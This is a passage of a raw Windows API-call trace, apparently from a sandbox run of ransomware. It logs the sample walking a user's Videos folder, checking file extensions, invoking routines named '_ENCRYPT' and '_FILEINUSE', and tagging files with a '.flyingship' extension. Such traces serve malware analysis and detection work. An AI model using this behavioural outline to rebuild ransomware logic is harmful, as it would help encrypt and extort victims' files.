SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.813] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0194.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0194.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0194.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0194.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0194.813] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0194.813] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x3729, lpOverlapped=0x0) returned 1 [0194.814] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0194.814] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x3729, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.814] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0194.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0194.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0194.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0194.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0194.814] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.flyingship.avi\r\n", cchWideChar=97, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 97 [0194.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x61) returned 0x8e8320 [0194.814] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.flyingship.avi\r\n", cchWideChar=97, lpMultiByteStr=0x8e8320, cbMultiByte=97, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.flyingship.avi\r\n", lpUsedDefaultChar=0x0) returned 97 [0194.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0194.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0194.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8320 | out: hHeap=0x8a0000) returned 1 [0194.814] WriteFile (in: hFile=0x158, lpBuffer=0x906f38*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x906f38*, lpNumberOfBytesWritten=0x87f43c*=0x60, lpOverlapped=0x0) returned 1 [0194.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0194.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0194.814] CloseHandle (hObject=0x158) returned 1 [0195.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0195.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0195.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0195.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0195.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0195.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0195.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0195.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0195.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0195.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0195.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0195.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0195.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0195.299] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0195.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0195.299] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0195.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0195.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0195.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0195.299] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0195.299] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0195.299] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0195.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0195.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0195.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0195.299] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0195.299] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0195.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0195.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0195.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0195.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0195.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0195.299] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0195.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0195.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0195.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0195.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0195.300] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0195.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0195.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0195.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0195.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9ba138 [0195.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9ba138, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0195.300] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\4_l5nhx538ki1\\g9kkkj.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0195.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0195.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0195.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0195.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0195.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0195.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0195.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0195.301] FreeLibrary (hLibModule=0x75990000) returned 1 [0195.301] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0195.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0195.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0195.302] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0195.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0195.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0195.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0195.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0195.302] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0195.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0195.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0195.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0195.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0195.302] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0195.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0195.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0195.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0195.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba498 [0195.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba498, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0195.303] FreeLibrary (hLibModule=0x75990000) returned 1 [0195.303] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0195.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0195.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0195.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0195.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0195.303] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0195.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0195.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0195.303] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0195.303] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0195.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0195.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0195.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0195.303] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0195.303] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0195.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0195.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0195.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0195.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0195.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0195.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0195.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0195.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0195.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0195.304] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0195.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0195.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0195.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0195.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0195.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0195.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0195.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6e48 [0195.304] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0195.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0195.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0195.304] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0195.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0195.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0195.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0195.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0195.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0195.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0195.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0195.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0195.305] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dae39b0, ftCreationTime.dwHighDateTime=0x1d5dc44, ftLastAccessTime.dwLowDateTime=0x50adf490, ftLastAccessTime.dwHighDateTime=0x1d5e44d, ftLastWriteTime.dwLowDateTime=0x50adf490, ftLastWriteTime.dwHighDateTime=0x1d5e44d, nFileSizeHigh=0x0, nFileSizeLow=0xab9c, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="g9kkkj.mp4", cAlternateFileName="")) returned 0x90add8 [0195.305] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0195.305] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0195.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0195.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0195.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0195.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0195.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0195.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0195.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0195.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0195.306] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dae39b0, ftCreationTime.dwHighDateTime=0x1d5dc44, ftLastAccessTime.dwLowDateTime=0x50adf490, ftLastAccessTime.dwHighDateTime=0x1d5e44d, ftLastWriteTime.dwLowDateTime=0x50adf490, ftLastWriteTime.dwHighDateTime=0x1d5e44d, nFileSizeHigh=0x0, nFileSizeLow=0xab9c, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="g9kkkj.mp4", cAlternateFileName="")) returned 0x90add8 [0195.306] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0195.306] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0195.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0195.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0195.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0195.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0195.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0195.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0195.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0195.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0195.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0195.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0195.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0195.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0195.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0195.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0195.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS 